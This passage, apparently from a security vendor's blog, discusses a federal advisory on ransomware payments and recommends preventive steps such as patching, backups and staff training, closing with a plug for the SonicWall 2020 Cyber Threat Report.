While the advisory does state that “a company’s self-initiated, timely and complete report of a ransomware attack to law enforcement” could be considered a significant mitigating factor in evaluating possible enforcement, remember that even in a best-case scenario — one that results in no federal fines or penalties whatsoever —  you’re still left between ransomware’s proverbial rock and a hard place. In other words, by the time you’re impacted by ransomware, there are no good options left. Your opportunity for a “good” outcome to a ransomware attack depends entirely on the actions you take before the fact.

Fortunately, there are many things you can do to nip ransomware in the bud, including regular patching, creating and maintaining quality backups, implementing employee education initiatives and more.

In the meantime, follow the latest trends in ransomware, such as where and how ransomware operators are attacking, by checking out the mid-year update of the SonicWall 2020 Cyber Threat Report.